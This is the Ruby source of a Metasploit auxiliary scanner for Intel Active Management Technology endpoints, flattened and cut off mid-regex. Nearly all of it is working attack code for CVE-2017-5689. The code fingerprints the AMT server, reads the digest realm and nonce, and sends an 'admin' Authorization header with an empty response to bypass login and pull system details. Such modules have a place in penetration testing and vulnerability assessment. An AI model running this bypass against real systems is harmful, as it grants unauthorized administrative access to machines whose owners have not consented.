## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/proto/http' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Intel AMT Digest Authentication Bypass Scanner', 'Description' => %q{ This module scans for Intel Active Management Technology endpoints and attempts to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service can be found on ports 16992, 16993 (tls), 623, and 624 (tls). }, 'Author' => 'hdm', 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2017-5689' ], [ 'URL', 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability' ], [ 'URL', 'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr' ], ], 'DisclosureDate' => 'May 05 2017' ) register_options( [ Opt::RPORT(16992), ]) end # Fingerprint a single host def run_host(ip) begin connect res = send_request_raw({ 'uri' => '/hw-sys.htm', 'method' => 'GET' }) unless res && res.headers['Server'].to_s.index('Intel(R) Active Management Technology') disconnect return end vprint_status("#{ip}:#{rport} - Found an Intel AMT endpoint: #{res.headers['Server']}") unless res.headers['WWW-Authenticate'] =~ /realm="([^"]+)".*nonce="([^"]+)"/ vprint_status("#{ip}:#{rport} - AMT service did not send a valid digest response") disconnect return end realm = $1 nonce = $2 cnonce = Rex::Text.rand_text(10) res = send_request_raw( { 'uri' => '/hw-sys.htm', 'method' => 'GET', 'headers' => { 'Authorization' => "Digest username=\"admin\", realm=\"#{realm}\", nonce=\"#{nonce}\", uri=\"/hw-sys.htm\", " + "cnonce=\"#{cnonce}\", nc=1, qop=\"auth\", response=\"\"" } }) unless res && res.body.to_s.index("Computer model") vprint_error("#{ip}:#{rport} - AMT service does not appear to be vulnerable") return end proof = res.body.to_s proof_hash = nil info_keys = res.body.scan(/
([^\<]+)(?:<\/p>)?/).map{|x| x.first.to_s.gsub("/", "/") } if info_keys.length > 0 proof_hash = {} proof = "" info_vals = res.body.scan(/